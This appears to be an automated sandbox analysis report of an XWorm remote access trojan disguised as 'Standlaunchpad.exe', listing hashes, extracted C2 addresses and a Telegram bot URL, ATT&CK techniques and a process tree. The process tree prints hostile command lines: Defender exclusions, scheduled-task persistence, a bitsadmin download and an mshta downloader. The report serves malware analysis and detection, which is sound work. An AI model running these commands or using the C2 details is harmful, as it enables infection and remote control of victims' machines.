xworm | e819962c084d4fad69a9f30b7a4e5d2cbb3d7e9af3f4a19b7a285ad3630d1da8

Analysis

max time kernel
150s
max time network
126s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
15/04/2024, 02:59

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

Standlaunchpad.exe
Size

132KB
MD5

716265d64dd58c6f312693e6c69844e1
SHA1

6db8ea7cdc175319aef202c1c61b228bdce2ae9b
SHA256

e819962c084d4fad69a9f30b7a4e5d2cbb3d7e9af3f4a19b7a285ad3630d1da8
SHA512

a9dc84f961f3c363cfe129f5e9f5e3311a95d9defb84b59e99d428b4e1a432e23f3016dae993e12744335c915b0902e17c74c0c37b5c330b92357254250ba801
SSDEEP

1536:buFEExqQ91YIprw6LUWIzQ2rk/xww6Ubv3bVuxPuz/5jcRU9DUq7HlxJxZr:b7Q9yIp9IhT8H6Ubv3pWu9z9DUqxx5r

Score

10^/10

xworm persistence rat trojan

Malware Config

Extracted

Family

xworm

127.0.0.1:18082

147.185.221.18:18082

8.tcp.us-cal-1.ngrok.io:18082

Attributes

Install_directory
%Temp%
install_file
Stand.exe
telegram
https://api.telegram.org/bot6916721041:AAGsGXyaplDWQ9HJlE88Z36KtBFClSB3E20

Signatures

Contains code to disable Windows Defender 1 IoCs

A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

resource	yara_rule
behavioral1/memory/2968-89-0x0000000002260000-0x000000000226E000-memory.dmp	disable_win_def

Detect Xworm Payload 3 IoCs

resource	yara_rule
behavioral1/files/0x000b000000012250-5.dat	family_xworm
behavioral1/memory/2968-9-0x00000000003A0000-0x00000000003BE000-memory.dmp	family_xworm
behavioral1/memory/2564-93-0x0000000000EA0000-0x0000000000EBE000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm

Drops startup file 3 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stand.lnk	Standlaunchpad.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stand.lnk	Standlaunchpad.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stand.lnk	Stand.exe

Executes dropped EXE 3 IoCs

pid	Process
2968	Standlaunchpad.exe
2564	Stand.exe
1572	Stand.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Windows\CurrentVersion\Run\Stand = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Stand.exe"	Standlaunchpad.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Windows\CurrentVersion\Run\Stand = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Stand.exe"	Stand.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 1 IoCs

Web Service

T1102

flow	ioc
12	8.tcp.us-cal-1.ngrok.io

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
8	ip-api.com
16	ip-api.com

Drops file in System32 directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
2756	schtasks.exe
2084	schtasks.exe

Download via BitsAdmin 1 TTPs 1 IoCs

dropper

BITS Jobs

T1197

pid	Process
2472	bitsadmin.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Suspicious behavior: AddClipboardFormatListener 3 IoCs

pid	Process
2968	Standlaunchpad.exe
2216	vlc.exe
1572	Stand.exe

Suspicious behavior: EnumeratesProcesses 15 IoCs

pid	Process
2664	powershell.exe
1748	powershell.exe
1324	powershell.exe
1688	powershell.exe
2968	Standlaunchpad.exe
2968	Standlaunchpad.exe
2968	Standlaunchpad.exe
2968	Standlaunchpad.exe
2968	Standlaunchpad.exe
2968	Standlaunchpad.exe
1204	powershell.exe
560	powershell.exe
2288	powershell.exe
1664	powershell.exe
1572	Stand.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
2216	vlc.exe

Suspicious use of AdjustPrivilegeToken 13 IoCs

description	pid	Process
Token: SeDebugPrivilege	2968	Standlaunchpad.exe
Token: SeDebugPrivilege	2664	powershell.exe
Token: SeDebugPrivilege	1748	powershell.exe
Token: SeDebugPrivilege	1324	powershell.exe
Token: SeDebugPrivilege	1688	powershell.exe
Token: SeDebugPrivilege	2968	Standlaunchpad.exe
Token: SeDebugPrivilege	2564	Stand.exe
Token: SeDebugPrivilege	1572	Stand.exe
Token: SeDebugPrivilege	1204	powershell.exe
Token: SeDebugPrivilege	560	powershell.exe
Token: SeDebugPrivilege	2288	powershell.exe
Token: SeDebugPrivilege	1664	powershell.exe
Token: SeDebugPrivilege	1572	Stand.exe

Suspicious use of FindShellTrayWindow 8 IoCs

pid	Process
2216	vlc.exe
2216	vlc.exe
2216	vlc.exe
2216	vlc.exe
2216	vlc.exe
2216	vlc.exe
2216	vlc.exe
2216	vlc.exe

Suspicious use of SendNotifyMessage 7 IoCs

pid	Process
2216	vlc.exe
2216	vlc.exe
2216	vlc.exe
2216	vlc.exe
2216	vlc.exe
2216	vlc.exe
2216	vlc.exe

Suspicious use of SetWindowsHookEx 3 IoCs

pid	Process
2968	Standlaunchpad.exe
2216	vlc.exe
1572	Stand.exe

Suspicious use of WriteProcessMemory 51 IoCs

description	pid	Process	procid_target
PID 2436 wrote to memory of 2968	2436	Standlaunchpad.exe	28
PID 2436 wrote to memory of 2968	2436	Standlaunchpad.exe	28
PID 2436 wrote to memory of 2968	2436	Standlaunchpad.exe	28
PID 2436 wrote to memory of 2508	2436	Standlaunchpad.exe	29
PID 2436 wrote to memory of 2508	2436	Standlaunchpad.exe	29
PID 2436 wrote to memory of 2508	2436	Standlaunchpad.exe	29
PID 2436 wrote to memory of 2508	2436	Standlaunchpad.exe	29
PID 2508 wrote to memory of 2472	2508	mshta.exe	30
PID 2508 wrote to memory of 2472	2508	mshta.exe	30
PID 2508 wrote to memory of 2472	2508	mshta.exe	30
PID 2508 wrote to memory of 2472	2508	mshta.exe	30
PID 2968 wrote to memory of 2664	2968	Standlaunchpad.exe	33
PID 2968 wrote to memory of 2664	2968	Standlaunchpad.exe	33
PID 2968 wrote to memory of 2664	2968	Standlaunchpad.exe	33
PID 2968 wrote to memory of 1748	2968	Standlaunchpad.exe	35
PID 2968 wrote to memory of 1748	2968	Standlaunchpad.exe	35
PID 2968 wrote to memory of 1748	2968	Standlaunchpad.exe	35
PID 2968 wrote to memory of 1324	2968	Standlaunchpad.exe	37
PID 2968 wrote to memory of 1324	2968	Standlaunchpad.exe	37
PID 2968 wrote to memory of 1324	2968	Standlaunchpad.exe	37
PID 2968 wrote to memory of 1688	2968	Standlaunchpad.exe	39
PID 2968 wrote to memory of 1688	2968	Standlaunchpad.exe	39
PID 2968 wrote to memory of 1688	2968	Standlaunchpad.exe	39
PID 2968 wrote to memory of 2756	2968	Standlaunchpad.exe	41
PID 2968 wrote to memory of 2756	2968	Standlaunchpad.exe	41
PID 2968 wrote to memory of 2756	2968	Standlaunchpad.exe	41
PID 2348 wrote to memory of 2564	2348	taskeng.exe	47
PID 2348 wrote to memory of 2564	2348	taskeng.exe	47
PID 2348 wrote to memory of 2564	2348	taskeng.exe	47
PID 2968 wrote to memory of 1016	2968	Standlaunchpad.exe	48
PID 2968 wrote to memory of 1016	2968	Standlaunchpad.exe	48
PID 2968 wrote to memory of 1016	2968	Standlaunchpad.exe	48
PID 2968 wrote to memory of 1016	2968	Standlaunchpad.exe	48
PID 2348 wrote to memory of 1572	2348	taskeng.exe	49
PID 2348 wrote to memory of 1572	2348	taskeng.exe	49
PID 2348 wrote to memory of 1572	2348	taskeng.exe	49
PID 1572 wrote to memory of 1204	1572	Stand.exe	50
PID 1572 wrote to memory of 1204	1572	Stand.exe	50
PID 1572 wrote to memory of 1204	1572	Stand.exe	50
PID 1572 wrote to memory of 560	1572	Stand.exe	52
PID 1572 wrote to memory of 560	1572	Stand.exe	52
PID 1572 wrote to memory of 560	1572	Stand.exe	52
PID 1572 wrote to memory of 2288	1572	Stand.exe	54
PID 1572 wrote to memory of 2288	1572	Stand.exe	54
PID 1572 wrote to memory of 2288	1572	Stand.exe	54
PID 1572 wrote to memory of 1664	1572	Stand.exe	56
PID 1572 wrote to memory of 1664	1572	Stand.exe	56
PID 1572 wrote to memory of 1664	1572	Stand.exe	56
PID 1572 wrote to memory of 2084	1572	Stand.exe	58
PID 1572 wrote to memory of 2084	1572	Stand.exe	58
PID 1572 wrote to memory of 2084	1572	Stand.exe	58

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\Standlaunchpad.exe
"C:\Users\Admin\AppData\Local\Temp\Standlaunchpad.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2436
- C:\Users\Admin\AppData\Roaming\Standlaunchpad.exe
  "C:\Users\Admin\AppData\Roaming\Standlaunchpad.exe"
  2⤵
  - Drops startup file
  - Executes dropped EXE
  - Adds Run key to start application
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:2968
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Standlaunchpad.exe'
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2664
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Standlaunchpad.exe'
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1748
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Stand.exe'
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1324
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Stand.exe'
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1688
- - C:\Windows\System32\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Stand" /tr "C:\Users\Admin\AppData\Local\Temp\Stand.exe"
    3⤵
    - Creates scheduled task(s)
    PID:2756
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" 52.9.153.64 18082 <123456789> 295C560058E07047CC6F
    3⤵
    PID:1016
- C:\Windows\SysWOW64\mshta.exe
  "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
  2⤵
  - Modifies Internet Explorer settings
  - Suspicious use of WriteProcessMemory
  PID:2508
- - C:\Windows\SysWOW64\bitsadmin.exe
    "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\XClient.exe
    3⤵
    - Download via BitsAdmin
    PID:2472

C:\Program Files\VideoLAN\VLC\vlc.exe
"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\Desktop\PublishApprove.rmi"
1⤵
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:2216

C:\Windows\system32\taskeng.exe
taskeng.exe {2706E96B-FAB9-4669-AA97-C426BEE04118} S-1-5-21-2297530677-1229052932-2803917579-1000:HKULBIBU\Admin:Interactive:[1]
1⤵
- Suspicious use of WriteProcessMemory
PID:2348
- C:\Users\Admin\AppData\Local\Temp\Stand.exe
  C:\Users\Admin\AppData\Local\Temp\Stand.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:2564
- C:\Users\Admin\AppData\Local\Temp\Stand.exe
  C:\Users\Admin\AppData\Local\Temp\Stand.exe
  2⤵
  - Drops startup file
  - Executes dropped EXE
  - Adds Run key to start application
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:1572
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Stand.exe'
    3⤵
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1204
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Stand.exe'
    3⤵
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:560
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Stand.exe'
    3⤵
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2288
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Stand.exe'
    3⤵
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1664
- - C:\Windows\System32\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Stand" /tr "C:\Users\Admin\AppData\Local\Temp\Stand.exe"
    3⤵
    - Creates scheduled task(s)
    PID:2084

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

BITS Jobs

T1197

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Defense Evasion

BITS Jobs

T1197

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Downloader.hta

Filesize
895B

MD5
053491717083a49c85cad7584f55ba79

SHA1
a7645a49952788db42bf667afa10e37123bd1317

SHA256
3902c3a03d0e50e5100d5e2b81d3775e2e43433293ba174cca523f6009e35b79

SHA512
936f02b49df1caf11ad7ebe26f28701b45cbcbd6de7d0a151ef65d090295cdc91270845220582dcae089ca26fdc1e5dfe4f90f626dc36643d7f2bc556ca8cb89

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
dd9902b449329be1401168f5e5e8f33c

SHA1
f44bc109cf6ac885a712213d74736f9422dbf013

SHA256
d830968b0b1899671c9a984e43e2b082148c3d16495a8fa2f39871af5a08227a

SHA512
c31c9fb04f0531a83ffe91bb8c854cf513a0b2fff379a0227f3d28ad3bf02eff2cfff7cc8ae25ede7f143a5a58f0cc5506a4eb4e972fa5de94055c5ce85e1cef

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\MXE3JZDF997RJEYCLOSZ.temp

Filesize
7KB

MD5
cc28717a1794355ea99c04c34220f80f

SHA1
564bcde434942c14ce396aaf99fc819920de464d

SHA256
dfea251434309012bf71a26e8edfd92c9ec40aa647b0e40af332ea4186701627

SHA512
92375c29597721601a475913e0106a233af959bb396ce6b03b689d279bf34a0eb2789313103f7873473c88942927d149535ef29060b4a6cf4f2ab69e3fac81d1

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stand.lnk

Filesize
936B

MD5
ae64d0fb4286163403d5c9e92fe07471

SHA1
2f5b48550a872917a3f4cc83152855b94e59d673

SHA256
6e8acc6a96a56ad9d67b936f9cfffff07fef290aabc66f061c5f8cf25ddb03d9

SHA512
ca9258b39ad984bbef6a6adbac3d866c156ca35bfb8a78c45f2bd62b72723c1a0d19fa35f8ca17c27d27625b938d1c6cdbac8b3a031e776abc75a7dcc6a6956a

Download Submit
C:\Users\Admin\AppData\Roaming\Standlaunchpad.exe

Filesize
96KB

MD5
bf7ee4fc77d1bd202db4d8f3012b1b25

SHA1
2e82842aaec5d9e6e93ce335260ab5bba65be5be

SHA256
1881352351ae38d8f746418425758711c3204b182cc53634d5e55de6a05bfa0d

SHA512
7265349a5363b1c38d919195c13320d4e68b687189223b7e705e7d32630959b22834f8462dd586aef9536f84a8d2a4b6a46d8a43bc0a59688615b06387902eb8

Download Submit
memory/560-613-0x0000000002A50000-0x0000000002AD0000-memory.dmp

Filesize
512KB

Download
memory/560-612-0x000007FEE8C80000-0x000007FEE961D000-memory.dmp

Filesize
9.6MB

Download
memory/1204-603-0x0000000002720000-0x0000000002728000-memory.dmp

Filesize
32KB

Download
memory/1204-605-0x0000000002890000-0x0000000002910000-memory.dmp

Filesize
512KB

Download
memory/1204-602-0x0000000002890000-0x0000000002910000-memory.dmp

Filesize
512KB

Download
memory/1204-601-0x000007FEE9620000-0x000007FEE9FBD000-memory.dmp

Filesize
9.6MB

Download
memory/1204-600-0x000007FEE9620000-0x000007FEE9FBD000-memory.dmp

Filesize
9.6MB

Download
memory/1204-606-0x000007FEE9620000-0x000007FEE9FBD000-memory.dmp

Filesize
9.6MB

Download
memory/1324-60-0x0000000002380000-0x0000000002400000-memory.dmp

Filesize
512KB

Download
memory/1324-65-0x000007FEEECC0000-0x000007FEEF65D000-memory.dmp

Filesize
9.6MB

Download
memory/1324-62-0x0000000002380000-0x0000000002400000-memory.dmp

Filesize
512KB

Download
memory/1324-63-0x0000000002380000-0x0000000002400000-memory.dmp

Filesize
512KB

Download
memory/1324-61-0x000007FEEECC0000-0x000007FEEF65D000-memory.dmp

Filesize
9.6MB

Download
memory/1324-59-0x000007FEEECC0000-0x000007FEEF65D000-memory.dmp

Filesize
9.6MB

Download
memory/1572-604-0x000007FEF4DE0000-0x000007FEF57CC000-memory.dmp

Filesize
9.9MB

Download
memory/1572-593-0x000000001B260000-0x000000001B2E0000-memory.dmp

Filesize
512KB

Download
memory/1572-523-0x000007FEF4DE0000-0x000007FEF57CC000-memory.dmp

Filesize
9.9MB

Download
memory/1688-78-0x000007FEEE320000-0x000007FEEECBD000-memory.dmp

Filesize
9.6MB

Download
memory/1688-74-0x000007FEEE320000-0x000007FEEECBD000-memory.dmp

Filesize
9.6MB

Download
memory/1688-73-0x0000000002A00000-0x0000000002A80000-memory.dmp

Filesize
512KB

Download
memory/1688-72-0x000007FEEE320000-0x000007FEEECBD000-memory.dmp

Filesize
9.6MB

Download
memory/1688-75-0x0000000002A00000-0x0000000002A80000-memory.dmp

Filesize
512KB

Download
memory/1688-76-0x0000000002A00000-0x0000000002A80000-memory.dmp

Filesize
512KB

Download
memory/1748-52-0x0000000002D30000-0x0000000002DB0000-memory.dmp

Filesize
512KB

Download
memory/1748-45-0x000000001B590000-0x000000001B872000-memory.dmp

Filesize
2.9MB

Download
memory/1748-47-0x000007FEEE320000-0x000007FEEECBD000-memory.dmp

Filesize
9.6MB

Download
memory/1748-46-0x00000000028F0000-0x00000000028F8000-memory.dmp

Filesize
32KB

Download
memory/1748-53-0x000007FEEE320000-0x000007FEEECBD000-memory.dmp

Filesize
9.6MB

Download
memory/1748-48-0x0000000002D30000-0x0000000002DB0000-memory.dmp

Filesize
512KB

Download
memory/1748-49-0x000007FEEE320000-0x000007FEEECBD000-memory.dmp

Filesize
9.6MB

Download
memory/1748-51-0x0000000002D30000-0x0000000002DB0000-memory.dmp

Filesize
512KB

Download
memory/1748-50-0x0000000002D30000-0x0000000002DB0000-memory.dmp

Filesize
512KB

Download
memory/2216-115-0x000007FEED120000-0x000007FEED138000-memory.dmp

Filesize
96KB

Download
memory/2216-134-0x000007FEECA80000-0x000007FEECA91000-memory.dmp

Filesize
68KB

Download
memory/2216-156-0x000007FEEC220000-0x000007FEEC232000-memory.dmp

Filesize
72KB

Download
memory/2216-157-0x000007FEEC200000-0x000007FEEC211000-memory.dmp

Filesize
68KB

Download
memory/2216-158-0x000007FEEC1E0000-0x000007FEEC1F1000-memory.dmp

Filesize
68KB

Download
memory/2216-155-0x000007FEEC240000-0x000007FEEC269000-memory.dmp

Filesize
164KB

Download
memory/2216-154-0x000007FEEC270000-0x000007FEEC286000-memory.dmp

Filesize
88KB

Download
memory/2216-153-0x000007FEEC290000-0x000007FEEC2A8000-memory.dmp

Filesize
96KB

Download
memory/2216-95-0x000000013FFE0000-0x00000001400D8000-memory.dmp

Filesize
992KB

Download
memory/2216-96-0x000007FEF1BF0000-0x000007FEF1C24000-memory.dmp

Filesize
208KB

Download
memory/2216-97-0x000007FEEE450000-0x000007FEEE704000-memory.dmp

Filesize
2.7MB

Download
memory/2216-98-0x000007FEF1B90000-0x000007FEF1BA8000-memory.dmp

Filesize
96KB

Download
memory/2216-99-0x000007FEF1B70000-0x000007FEF1B87000-memory.dmp

Filesize
92KB

Download
memory/2216-100-0x000007FEF03C0000-0x000007FEF03D1000-memory.dmp

Filesize
68KB

Download
memory/2216-101-0x000007FEF0220000-0x000007FEF0237000-memory.dmp

Filesize
92KB

Download
memory/2216-102-0x000007FEF0200000-0x000007FEF0211000-memory.dmp

Filesize
68KB

Download
memory/2216-103-0x000007FEF01E0000-0x000007FEF01FD000-memory.dmp

Filesize
116KB

Download
memory/2216-104-0x000007FEEF8C0000-0x000007FEEF8D1000-memory.dmp

Filesize
68KB

Download
memory/2216-105-0x000007FEEE250000-0x000007FEEE450000-memory.dmp

Filesize
2.0MB

Download
memory/2216-106-0x000007FEED1A0000-0x000007FEEE24B000-memory.dmp

Filesize
16.7MB

Download
memory/2216-107-0x000007FEEF880000-0x000007FEEF8BF000-memory.dmp

Filesize
252KB

Download
memory/2216-108-0x000007FEEF850000-0x000007FEEF871000-memory.dmp

Filesize
132KB

Download
memory/2216-109-0x000007FEEF830000-0x000007FEEF848000-memory.dmp

Filesize
96KB

Download
memory/2216-110-0x000007FEEF810000-0x000007FEEF821000-memory.dmp

Filesize
68KB

Download
memory/2216-111-0x000007FEEF7F0000-0x000007FEEF801000-memory.dmp

Filesize
68KB

Download
memory/2216-112-0x000007FEED180000-0x000007FEED191000-memory.dmp

Filesize
68KB

Download
memory/2216-113-0x000007FEED160000-0x000007FEED17B000-memory.dmp

Filesize
108KB

Download
memory/2216-114-0x000007FEED140000-0x000007FEED151000-memory.dmp

Filesize
68KB

Download
memory/2216-152-0x000007FEEC2B0000-0x000007FEEC2C2000-memory.dmp

Filesize
72KB

Download
memory/2216-116-0x000007FEED0F0000-0x000007FEED120000-memory.dmp

Filesize
192KB

Download
memory/2216-117-0x000007FEED080000-0x000007FEED0E7000-memory.dmp

Filesize
412KB

Download
memory/2216-118-0x000007FEED010000-0x000007FEED07F000-memory.dmp

Filesize
444KB

Download
memory/2216-119-0x000007FEECFF0000-0x000007FEED001000-memory.dmp

Filesize
68KB

Download
memory/2216-120-0x000007FEECF90000-0x000007FEECFE6000-memory.dmp

Filesize
344KB

Download
memory/2216-121-0x000007FEECF60000-0x000007FEECF88000-memory.dmp

Filesize
160KB

Download
memory/2216-122-0x000007FEECF30000-0x000007FEECF54000-memory.dmp

Filesize
144KB

Download
memory/2216-123-0x000007FEECF10000-0x000007FEECF27000-memory.dmp

Filesize
92KB

Download
memory/2216-124-0x000007FEECEE0000-0x000007FEECF03000-memory.dmp

Filesize
140KB

Download
memory/2216-125-0x000007FEECEC0000-0x000007FEECED1000-memory.dmp

Filesize
68KB

Download
memory/2216-126-0x000007FEECEA0000-0x000007FEECEB2000-memory.dmp

Filesize
72KB

Download
memory/2216-127-0x000007FEECE70000-0x000007FEECE91000-memory.dmp

Filesize
132KB

Download
memory/2216-128-0x000007FEECE50000-0x000007FEECE63000-memory.dmp

Filesize
76KB

Download
memory/2216-129-0x000007FEECE30000-0x000007FEECE42000-memory.dmp

Filesize
72KB

Download
memory/2216-130-0x000007FEECCF0000-0x000007FEECE2B000-memory.dmp

Filesize
1.2MB

Download
memory/2216-131-0x000007FEECCC0000-0x000007FEECCEC000-memory.dmp

Filesize
176KB

Download
memory/2216-132-0x000007FEECB00000-0x000007FEECCB2000-memory.dmp

Filesize
1.7MB

Download
memory/2216-133-0x000007FEECAA0000-0x000007FEECAFC000-memory.dmp

Filesize
368KB

Download
memory/2216-151-0x000007FEEC2D0000-0x000007FEEC2E1000-memory.dmp

Filesize
68KB

Download
memory/2216-135-0x000007FEEC9E0000-0x000007FEECA77000-memory.dmp

Filesize
604KB

Download
memory/2216-136-0x000007FEEC9C0000-0x000007FEEC9D2000-memory.dmp

Filesize
72KB

Download
memory/2216-137-0x000007FEEC780000-0x000007FEEC9B1000-memory.dmp

Filesize
2.2MB

Download
memory/2216-138-0x000007FEEC660000-0x000007FEEC772000-memory.dmp

Filesize
1.1MB

Download
memory/2216-141-0x000007FEEC5D0000-0x000007FEEC5E1000-memory.dmp

Filesize
68KB

Download
memory/2216-140-0x000007FEEC5F0000-0x000007FEEC615000-memory.dmp

Filesize
148KB

Download
memory/2216-139-0x000007FEEC620000-0x000007FEEC655000-memory.dmp

Filesize
212KB

Download
memory/2216-142-0x000007FEEC560000-0x000007FEEC5C1000-memory.dmp

Filesize
388KB

Download
memory/2216-143-0x000007FEEC540000-0x000007FEEC551000-memory.dmp

Filesize
68KB

Download
memory/2216-144-0x000007FEEC520000-0x000007FEEC532000-memory.dmp

Filesize
72KB

Download
memory/2216-145-0x000007FEEC500000-0x000007FEEC513000-memory.dmp

Filesize
76KB

Download
memory/2216-146-0x000007FEEC460000-0x000007FEEC4FF000-memory.dmp

Filesize
636KB

Download
memory/2216-147-0x000007FEEC440000-0x000007FEEC451000-memory.dmp

Filesize
68KB

Download
memory/2216-148-0x000007FEEC330000-0x000007FEEC432000-memory.dmp

Filesize
1.0MB

Download
memory/2216-149-0x000007FEEC310000-0x000007FEEC321000-memory.dmp

Filesize
68KB

Download
memory/2216-150-0x000007FEEC2F0000-0x000007FEEC301000-memory.dmp

Filesize
68KB

Download
memory/2436-0-0x0000000000100000-0x0000000000126000-memory.dmp

Filesize
152KB

Download
memory/2436-1-0x000007FEF57D0000-0x000007FEF61BC000-memory.dmp

Filesize
9.9MB

Download
memory/2436-11-0x000007FEF57D0000-0x000007FEF61BC000-memory.dmp

Filesize
9.9MB

Download
memory/2564-164-0x000007FEF57D0000-0x000007FEF61BC000-memory.dmp

Filesize
9.9MB

Download
memory/2564-94-0x000007FEF57D0000-0x000007FEF61BC000-memory.dmp

Filesize
9.9MB

Download
memory/2564-93-0x0000000000EA0000-0x0000000000EBE000-memory.dmp

Filesize
120KB

Download
memory/2664-31-0x000000001B620000-0x000000001B902000-memory.dmp

Filesize
2.9MB

Download
memory/2664-33-0x0000000002BE0000-0x0000000002C60000-memory.dmp

Filesize
512KB

Download
memory/2664-39-0x000007FEEECC0000-0x000007FEEF65D000-memory.dmp

Filesize
9.6MB

Download
